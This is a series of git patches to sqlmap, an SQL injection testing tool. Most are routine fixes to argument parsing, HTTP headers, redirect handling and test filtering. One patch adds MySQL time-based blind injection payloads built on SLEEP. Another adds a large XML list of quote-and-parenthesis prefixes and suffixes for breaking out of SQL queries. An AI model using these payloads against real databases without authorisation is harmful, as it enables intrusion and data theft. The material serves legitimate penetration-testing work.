--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -788,7 +788,7 @@ def cmdLineParser():
         prompt = False
         advancedHelp = True
 
-        for arg in sys.argv:
+        for arg in (sys.argv if not IS_WIN else shlex.split(" ".join(sys.argv))):
             argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
 
         checkDeprecatedOptions(argv)

From 59f0da369d0bf656d557f93e0751d09f320d8218 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 2 Feb 2015 22:07:16 +0100
Subject: [PATCH 326/492] Patch for a bug reported via ML (Accept header
 ignored in --headers)

---
 lib/request/connect.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 15296a36c..2cf6ea99e 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -329,7 +329,9 @@ class Connect(object):
             if kb.proxyAuthHeader:
                 headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
 
-            headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
+            if HTTP_HEADER.ACCEPT not in headers:
+                headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
+
             headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
             headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
 

From 2af2aef43ead8e27555509f4a1076941d9cdd5af Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 3 Feb 2015 09:48:05 +0100
Subject: [PATCH 327/492] Minor patch for masking sensitive information (when
 formation -u=... is used)

---
 lib/core/common.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 47207972a..11f9c9fc1 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3003,9 +3003,9 @@ def maskSensitiveData(msg):
             retVal = retVal.replace(value, '*' * len(value))
 
     if not conf.get("hostname"):
-        match = re.search(r"(?i)sqlmap.+(-u|--url)\s+([^ ]+)", retVal)
+        match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal)
         if match:
-            retVal = retVal.replace(match.group(2), '*' * len(match.group(2)))
+            retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
 
 
     if getpass.getuser():

From eecc0b924b6c4374ea7c5694cc816eb6595f115f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 3 Feb 2015 10:06:00 +0100
Subject: [PATCH 328/492] Patch for an Issue #1148

---
 lib/parse/cmdline.py | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index b5d13e7c8..4396bac52 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -788,7 +788,16 @@ def cmdLineParser():
         prompt = False
         advancedHelp = True
 
-        for arg in (sys.argv if not IS_WIN else shlex.split(" ".join(sys.argv))):
+        _ = sys.argv
+
+        # Python on Windows has problems with quote/whitespace cases like: python -c "import sys; print sys.argv" --dummy='foo: bar'  # ['-c', "--dummy='foo:", "bar'"]
+        if IS_WIN:
+            try:
+                _ = shlex.split(" ".join(sys.argv), posix=False)
+            except ValueError:
+                pass
+
+        for arg in _:
             argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
 
         checkDeprecatedOptions(argv)

From 66c2a7939761a54cefce5aead662bfd2f2716608 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Tue, 3 Feb 2015 15:14:41 +0000
Subject: [PATCH 329/492] added a time-based payload for MySQL when the simpler
 AND SLEEP(X) does not work

---
 xml/payloads.xml | 41 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index c85aedd63..5fb16dc72 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2454,6 +2454,47 @@ Formats:
 
 
     <!-- AND time-based blind tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 AND time-based blind</title>
         <stype>5</stype>

From 38011743bbc514962977be1cd8b539ab9ea25adb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 4 Feb 2015 15:01:03 +0100
Subject: [PATCH 330/492] Patch for an Issue #1157

---
 lib/request/connect.py         |  2 +-
 lib/request/redirecthandler.py | 20 ++++++++++++++++++++
 2 files changed, 21 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 2cf6ea99e..ef7cd40fe 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -166,7 +166,7 @@ class Connect(object):
 
         if not kb.dnsMode and conn:
             headers = conn.info()
-            if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
+            if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
               or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
                 retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
                 if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py
index fca69c8dc..23b5a5774 100644
--- a/lib/request/redirecthandler.py
+++ b/lib/request/redirecthandler.py
@@ -5,6 +5,7 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import types
 import urllib2
 import urlparse
 
@@ -124,6 +125,25 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
                 result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
             except urllib2.HTTPError, e:
                 result = e
+
+                # Dirty hack for http://bugs.python.org/issue15701
+                try:
+                    result.info()
+                except AttributeError:
+                    def _(self):
+                        return getattr(self, "hdrs") or {}
+                    result.info = types.MethodType(_, result)
+
+                if not hasattr(result, "read"):
+                    def _(self, length=None):
+                        return e.msg
+                    result.read = types.MethodType(_, result)
+
+                if not getattr(result, "url", None):
+                    result.url = redurl
+
+                if not getattr(result, "code", None):
+                    result.code = 999
             except:
                 redurl = None
                 result = fp

From 247384858ec5929211200cefbfa4a0f8ddecb071 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 4 Feb 2015 16:21:21 +0100
Subject: [PATCH 331/492] Patch for an Issue #1159 (undo commit with
 single-quotes problem on windows)

---
 lib/parse/cmdline.py | 11 +----------
 1 file changed, 1 insertion(+), 10 deletions(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 4396bac52..6cda6f500 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -788,16 +788,7 @@ def cmdLineParser():
         prompt = False
         advancedHelp = True
 
-        _ = sys.argv
-
-        # Python on Windows has problems with quote/whitespace cases like: python -c "import sys; print sys.argv" --dummy='foo: bar'  # ['-c', "--dummy='foo:", "bar'"]
-        if IS_WIN:
-            try:
-                _ = shlex.split(" ".join(sys.argv), posix=False)
-            except ValueError:
-                pass
-
-        for arg in _:
+        for arg in sys.argv:
             argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
 
         checkDeprecatedOptions(argv)

From b1d13d1e7d5bc055321610f91e7315c95aeb8de4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 6 Feb 2015 09:05:41 +0100
Subject: [PATCH 332/492] Patch for an Issue #1158

---
 sqlmap.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sqlmap.py b/sqlmap.py
index c01bab3ad..81b3e756e 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -62,7 +62,7 @@ def modulePath():
     except NameError:
         _ = inspect.getsourcefile(modulePath)
 
-    return os.path.dirname(os.path.realpath(getUnicode(_, sys.getfilesystemencoding())))
+    return getUnicode(os.path.dirname(os.path.realpath(_)), sys.getfilesystemencoding())
 
 def main():
     """

From 2e5c11e4277b61f66ee98e82efa2603ee8148e05 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 13 Feb 2015 10:59:03 +0100
Subject: [PATCH 333/492] Closes #1163

---
 lib/controller/checks.py | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 589ed8a86..7df1d862a 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -196,25 +196,6 @@ def checkSqlInjection(place, parameter, value):
                     logger.debug(debugMsg)
                     continue
 
-            elif not (kb.extendTests and intersect(dbms, kb.extendTests)):
-                # Skip test if the risk is higher than the provided (or default)
-                # value
-                # Parse test's <risk>
-                if test.risk > conf.risk:
-                    debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
-                    debugMsg += "is higher than the provided (%d)" % conf.risk
-                    logger.debug(debugMsg)
-                    continue
-
-                # Skip test if the level is higher than the provided (or default)
-                # value
-                # Parse test's <level>
-                if test.level > conf.level:
-                    debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
-                    debugMsg += "is higher than the provided (%d)" % conf.level
-                    logger.debug(debugMsg)
-                    continue
-
             if dbms is not None:
                 if injection.dbms is not None and not intersect(injection.dbms, dbms):
                     debugMsg = "skipping test '%s' because " % title
@@ -237,6 +218,25 @@ def checkSqlInjection(place, parameter, value):
                     logger.debug(debugMsg)
                     continue
 
+            if not (kb.extendTests and intersect(dbms, kb.extendTests)):
+                # Skip test if the risk is higher than the provided (or default)
+                # value
+                # Parse test's <risk>
+                if test.risk > conf.risk:
+                    debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
+                    debugMsg += "is higher than the provided (%d)" % conf.risk
+                    logger.debug(debugMsg)
+                    continue
+
+                # Skip test if the level is higher than the provided (or default)
+                # value
+                # Parse test's <level>
+                if test.level > conf.level:
+                    debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
+                    debugMsg += "is higher than the provided (%d)" % conf.level
+                    logger.debug(debugMsg)
+                    continue
+
             # Skip test if it does not match the same SQL injection clause
             # already identified by another test
             clauseMatch = False

From 863d5a6281a5e24303d38ea99515bdb128456889 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 15 Feb 2015 16:28:37 +0000
Subject: [PATCH 334/492] --test-filter now ignores values of --risk and
 --level

---
 lib/controller/checks.py | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 7df1d862a..653f7d8d8 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -188,9 +188,11 @@ def checkSqlInjection(place, parameter, value):
             else:
                 dbms = None
 
-            # Skip tests if title is not included by the given filter
-            if conf.testFilter:
-                if not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)):
+            # Skip tests if title, vector or DBMS is not included by the
+            # given test filter
+            if conf.testFilter and not any(conf.testFilter in str(item) or \
+               re.search(conf.testFilter, str(item), re.I) for item in \
+               (test.title, test.vector, dbms)):
                     debugMsg = "skipping test '%s' because " % title
                     debugMsg += "its name/vector/dbms is not included by the given filter"
                     logger.debug(debugMsg)
@@ -222,7 +224,7 @@ def checkSqlInjection(place, parameter, value):
                 # Skip test if the risk is higher than the provided (or default)
                 # value
                 # Parse test's <risk>
-                if test.risk > conf.risk:
+                if not conf.testFilter and test.risk > conf.risk:
                     debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
                     debugMsg += "is higher than the provided (%d)" % conf.risk
                     logger.debug(debugMsg)
@@ -231,7 +233,7 @@ def checkSqlInjection(place, parameter, value):
                 # Skip test if the level is higher than the provided (or default)
                 # value
                 # Parse test's <level>
-                if test.level > conf.level:
+                if not conf.testFilter and not test.level > conf.level:
                     debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
                     debugMsg += "is higher than the provided (%d)" % conf.level
                     logger.debug(debugMsg)

From 32ab52b8ca26632300f863b86e4bbde8ac055032 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 15 Feb 2015 16:31:35 +0000
Subject: [PATCH 335/492] code refactoring: split boundaries and payloads XML
 files

---
 lib/core/common.py                            |   3 +-
 lib/core/option.py                            |   2 +
 lib/parse/payloads.py                         |  26 +-
 xml/boundaries.xml                            | 519 ++++++++++++++++++
 .../00_payloads.xml}                          | 515 -----------------
 5 files changed, 546 insertions(+), 519 deletions(-)
 create mode 100644 xml/boundaries.xml
 rename xml/{payloads.xml => payloads/00_payloads.xml} (91%)

diff --git a/lib/core/common.py b/lib/core/common.py
index 11f9c9fc1..5b9ea7afd 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1085,6 +1085,7 @@ def setPaths():
     paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
     paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
     paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
+    paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
 
     _ = os.path.join(os.path.expanduser("~"), ".sqlmap")
     paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
@@ -1105,7 +1106,7 @@ def setPaths():
     paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
     paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
     paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
-    paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
+    paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "boundaries.xml")
     paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
     paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
     paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
diff --git a/lib/core/option.py b/lib/core/option.py
index 6288f52ee..9c40e7198 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -130,6 +130,7 @@ from lib.core.settings import WEBSCARAB_SPLITTER
 from lib.core.threads import getCurrentThreadData
 from lib.core.update import update
 from lib.parse.configfile import configFileParser
+from lib.parse.payloads import loadBoundaries
 from lib.parse.payloads import loadPayloads
 from lib.parse.sitemap import parseSitemap
 from lib.request.basic import checkCharEncoding
@@ -2400,6 +2401,7 @@ def init():
     _setWriteFile()
     _setMetasploit()
     _setDBMSAuthentication()
+    loadBoundaries()
     loadPayloads()
     _setPrefixSuffix()
     update()
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index f41db9dfd..84e6b0a82 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -5,6 +5,8 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
+
 from xml.etree import ElementTree as et
 
 from lib.core.data import conf
@@ -67,14 +69,32 @@ def parseXmlNode(node):
 
         conf.tests.append(test)
 
-def loadPayloads():
+def loadBoundaries():
     try:
-        doc = et.parse(paths.PAYLOADS_XML)
+        doc = et.parse(paths.BOUNDARIES_XML)
     except Exception, ex:
         errMsg = "something seems to be wrong with "
-        errMsg += "the file '%s' ('%s'). Please make " % (paths.PAYLOADS_XML, ex)
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
         errMsg += "sure that you haven't made any changes to it"
         raise SqlmapInstallationException, errMsg
 
     root = doc.getroot()
     parseXmlNode(root)
+
+def loadPayloads():
+    payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
+    payloadFiles.sort()
+
+    for payloadFile in payloadFiles:
+        payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
+
+        try:
+            doc = et.parse(payloadFilePath)
+        except Exception, ex:
+            errMsg = "something seems to be wrong with "
+            errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
+            errMsg += "sure that you haven't made any changes to it"
+            raise SqlmapInstallationException, errMsg
+
+    root = doc.getroot()
+    parseXmlNode(root)
diff --git a/xml/boundaries.xml b/xml/boundaries.xml
new file mode 100644
index 000000000..0da7a6036
--- /dev/null
+++ b/xml/boundaries.xml
@@ -0,0 +1,519 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+Tag: <boundary>
+    How to prepend and append to the test ' <payload><comment> ' string.
+
+    Sub-tag: <level>
+        From which level check for this test.
+
+        Valid values:
+            1: Always (<100 requests)
+            2: Try a bit harder (100-200 requests)
+            3: Good number of requests (200-500 requests)
+            4: Extensive test (500-1000 requests)
+            5: You have plenty of time (>1000 requests)
+
+    Sub-tag: <clause>
+        In which clause the payload can work.
+
+        NOTE: for instance, there are some payload that do not have to be
+        tested as soon as it has been identified whether or not the
+        injection is within a WHERE clause condition.
+
+        Valid values:
+            0: Always
+            1: WHERE / HAVING
+            2: GROUP BY
+            3: ORDER BY
+            4: LIMIT
+            5: OFFSET
+            6: TOP
+            7: Table name
+            8: Column name
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <where>
+        Where to add our '<prefix> <payload><comment> <suffix>' string.
+
+        Valid values:
+            1: When the value of <test>'s <where> is 1.
+            2: When the value of <test>'s <where> is 2.
+            3: When the value of <test>'s <where> is 3.
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <ptype>
+        What is the parameter value type.
+
+        Valid values:
+            1: Unescaped numeric
+            2: Single quoted string
+            3: LIKE single quoted string
+            4: Double quoted string
+            5: LIKE double quoted string
+
+    Sub-tag: <prefix>
+        A string to prepend to the payload.
+
+    Sub-tag: <suffix>
+        A string to append to the payload.
+
+Formats:
+    <boundary>
+        <level></level>
+        <clause></clause>
+        <where></where>
+        <ptype></ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+-->
+
+<root>
+    <!-- Generic boundaries -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1,2,3</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix></suffix>
+    </boundary>
+    <!-- End of generic boundaries -->
+
+    <!-- WHERE/HAVING clause boundaries -->
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>))</prefix>
+        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)))</prefix>
+        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>0</clause>
+        <where>1,2,3</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%')</prefix>
+        <suffix> AND ('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%'))</prefix>
+        <suffix> AND (('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%')))</prefix>
+        <suffix> AND ((('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%'</prefix>
+        <suffix> AND '%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00')</prefix>
+        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00'</prefix>
+        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix>-- [RANDSTR]</suffix>
+    </boundary>
+    <!-- End of WHERE/HAVING clause boundaries -->
+
+    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- Pre-WHERE derived table boundaries (e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
